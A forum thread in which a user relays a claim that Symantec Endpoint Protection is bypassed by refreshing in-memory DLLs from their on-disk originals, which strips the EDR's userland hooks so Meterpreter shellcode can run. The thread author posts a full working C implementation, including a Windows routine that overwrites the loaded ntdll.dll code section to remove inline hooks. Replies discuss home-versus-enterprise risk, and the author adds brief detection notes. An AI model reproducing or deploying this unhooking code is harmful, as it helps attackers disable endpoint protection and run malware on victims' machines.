Advice Request: Symantec Endpoint Protection bypassed with a DLL (PoC)


Andrew3000 (Thread author)
Feb 8, 2016
"Symantec Endpoint Protection is bypassed super easily using my dusty DLL refresh PoC. After refreshing in-mem DLLs with the on-disk orig versions, userland hooks got removed completely, making the EDR blind, and allowing us to execute Meterpreter shellcode by simple API calls."
Quite surprising, because Symantec sells itself as blocking everything and having very good anti-attack protection :D
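
The tweet quoted above describes the technique only in one sentence, so here is an added worked example of what "refreshing in-memory DLLs from the on-disk originals" actually does. This is my own illustration, not the PoC author's code: it parses the PE headers of a module to find its .text section, counts the bytes where the mapped copy differs from the file on disk (that difference is exactly the EDR's inline hooks) and, on request, copies the clean bytes back. The core works on plain byte buffers and runs anywhere; the sample "DLL" it operates on is constructed in build_sample() (one .text section holding a typical x64 syscall stub, with a simulated jmp rel32 hook applied to the mapped copy). The refresh_ntdll_from_disk() wrapper under _WIN32 is my assumption of how such a PoC applies the same core to the real ntdll.dll (read the file the loader used, VirtualProtect .text to RWX, refresh, restore the old protection).

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Just enough of the PE headers to find a section; avoids windows.h so the core builds anywhere. */
#pragma pack(push, 1)
typedef struct { uint16_t e_magic; uint8_t reserved[58]; uint32_t e_lfanew; } dos_hdr_t;
typedef struct { uint32_t signature; uint16_t machine, num_sections; uint32_t timestamp, sym_table, num_syms;
                 uint16_t opt_hdr_size, characteristics; } nt_hdr_t;
typedef struct { char name[8]; uint32_t virtual_size, virtual_address, raw_size, raw_ptr; uint8_t unused[16]; } section_hdr_t;
#pragma pack(pop)

/* Locate ".text" in a PE image. Headers are identical in the on-disk and mapped layouts. Returns 0 on success. */
static int find_text_section(const uint8_t *img, size_t len, section_hdr_t *out) {
    dos_hdr_t dos; nt_hdr_t nt;
    if (len < sizeof dos) return -1;
    memcpy(&dos, img, sizeof dos);
    if (dos.e_magic != 0x5A4D || (size_t)dos.e_lfanew + sizeof nt > len) return -1;   /* "MZ" */
    memcpy(&nt, img + dos.e_lfanew, sizeof nt);
    if (nt.signature != 0x00004550) return -1;                                          /* "PE\0\0" */
    size_t off = dos.e_lfanew + sizeof nt + nt.opt_hdr_size;                            /* first section header */
    for (unsigned i = 0; i < nt.num_sections; i++, off += sizeof *out) {
        if (off + sizeof *out > len) return -1;
        memcpy(out, img + off, sizeof *out);
        if (memcmp(out->name, ".text\0\0\0", 8) == 0) return 0;
    }
    return -1;
}

/* Compare the mapped .text with the on-disk copy: every differing byte is a hook or patch.
 * With restore != 0 the clean bytes are copied over the mapped ones. Returns the differing byte count, -1 on error. */
static long refresh_text(uint8_t *mapped, size_t mapped_len, const uint8_t *disk, size_t disk_len, int restore) {
    section_hdr_t text;
    if (find_text_section(disk, disk_len, &text) != 0) return -1;
    size_t n = text.virtual_size < text.raw_size ? text.virtual_size : text.raw_size;
    if ((size_t)text.raw_ptr + n > disk_len || (size_t)text.virtual_address + n > mapped_len) return -1;
    const uint8_t *src = disk + text.raw_ptr;
    uint8_t *dst = mapped + text.virtual_address;
    long diff = 0;
    for (size_t i = 0; i < n; i++) diff += src[i] != dst[i];
    if (restore && diff) memcpy(dst, src, n);
    return diff;
}

/* Constructed sample (not a real DLL): one-section PE whose .text is a typical x64 syscall stub,
 * plus a simulated EDR inline hook (jmp rel32 over the prologue) applied only to the mapped copy. */
enum { DISK_LEN = 0x210, MAPPED_LEN = 0x1010, TEXT_RVA = 0x1000, TEXT_RAW = 0x200 };
static const uint8_t CLEAN_STUB[16] = { 0x4C,0x8B,0xD1, 0xB8,0x18,0,0,0, 0x0F,0x05, 0xC3, 0xCC,0xCC,0xCC,0xCC,0xCC };
static const uint8_t HOOK_JMP[5] = { 0xE9, 0x10, 0x20, 0x30, 0x40 };   /* jump target is arbitrary here */

static void build_sample(uint8_t *disk, uint8_t *mapped) {
    dos_hdr_t dos = { 0x5A4D, {0}, 0x40 };
    nt_hdr_t nt = { 0x00004550, 0x8664, 1, 0, 0, 0, 16, 0x2022 };       /* 16-byte zeroed optional header */
    section_hdr_t text = { ".text", 16, TEXT_RVA, 16, TEXT_RAW, {0} };
    memset(disk, 0, DISK_LEN); memset(mapped, 0, MAPPED_LEN);
    memcpy(disk, &dos, sizeof dos);
    memcpy(disk + 0x40, &nt, sizeof nt);
    memcpy(disk + 0x40 + sizeof nt + 16, &text, sizeof text);
    memcpy(disk + TEXT_RAW, CLEAN_STUB, sizeof CLEAN_STUB);
    memcpy(mapped, disk, TEXT_RAW);                           /* loader: headers at base ... */
    memcpy(mapped + TEXT_RVA, CLEAN_STUB, sizeof CLEAN_STUB); /* ... and .text at its RVA */
    memcpy(mapped + TEXT_RVA, HOOK_JMP, sizeof HOOK_JMP);     /* EDR: inline hook on the prologue */
}

/* Detect, restore, re-check. Returns 0 when the mapped .text again equals the clean stub. */
int demo(long *hooked_bytes, long *after_restore) {
    uint8_t disk[DISK_LEN], mapped[MAPPED_LEN];
    build_sample(disk, mapped);
    *hooked_bytes  = refresh_text(mapped, MAPPED_LEN, disk, DISK_LEN, 0);   /* 5: the jmp rel32 */
    refresh_text(mapped, MAPPED_LEN, disk, DISK_LEN, 1);                    /* overwrite with clean bytes */
    *after_restore = refresh_text(mapped, MAPPED_LEN, disk, DISK_LEN, 0);   /* 0 */
    return memcmp(mapped + TEXT_RVA, CLEAN_STUB, sizeof CLEAN_STUB) == 0 ? 0 : -1;
}

#ifdef _WIN32
#include <windows.h>
/* Assumed real-world use: refresh the loaded ntdll.dll from the file the loader mapped it from. */
long refresh_ntdll_from_disk(void) {
    HMODULE base = GetModuleHandleA("ntdll.dll");
    char path[MAX_PATH];
    if (!base || !GetModuleFileNameA(base, path, MAX_PATH)) return -1;
    HANDLE f = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (f == INVALID_HANDLE_VALUE) return -1;
    DWORD size = GetFileSize(f, NULL), got = 0, old = 0;
    uint8_t *disk = (uint8_t *)malloc(size);
    int ok = disk && ReadFile(f, disk, size, &got, NULL) && got == size;
    CloseHandle(f);
    long changed = -1;
    section_hdr_t text;
    if (ok && find_text_section(disk, size, &text) == 0) {
        uint8_t *dst = (uint8_t *)base + text.virtual_address;
        if (VirtualProtect(dst, text.virtual_size, PAGE_EXECUTE_READWRITE, &old)) {
            changed = refresh_text((uint8_t *)base, text.virtual_address + text.virtual_size, disk, size, 1);
            VirtualProtect(dst, text.virtual_size, old, &old);   /* back to RX */
        }
    }
    free(disk);
    return changed;
}
#endif

int main(void) {
    long hooked, left;
    int ok = demo(&hooked, &left);
    printf("hooked bytes: %ld, after refresh: %ld, restored: %s\n", hooked, left, ok == 0 ? "yes" : "no");
    return ok;
}
```

Two things worth keeping in mind when reading the tweet. First, the copy is only valid for a module whose .text carries no base relocations (true of x64 ntdll, where code is RIP-relative); for a module that does, the raw file bytes would have to be relocated first. Second, the same comparison cuts both ways: an EDR (or a hunting script) that periodically diffs the mapped ntdll .text against the on-disk file, or watches for VirtualProtect calls that make ntdll's code writable, sees this refresh as a clear signal, and refreshing .text does nothing about kernel callbacks, ETW-TI or memory scanning, so the "EDR blind" claim only covers the userland inline hooks.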

In the home environment, this attack will be prevented by Norton Download Insight (a DLL or any other kind of malware originating from the Internet or a USB drive).
The attack can be dangerous in enterprises if the local network has already been hacked.
 
It will probably get a reputation block, but it can still affect home users through a script that bypasses Insight; it will probably not happen, though, so don't worry.
 
Yes. Scripting attacks can bypass Norton Insight on home computers. But the attack method in the OP requires high privileges and is part of lateral movement in an already compromised local network. Without lateral movement, the attacker must find another way to deliver/run the executable (run_with_unhook.exe). In the home environment, this can be done via the Internet or a USB drive, and both are protected by Norton Insight.
It is possible to perform a similar attack filelessly by using scripting methods combined with process hollowing or similar methods, but this would be more complicated.
 
💯 %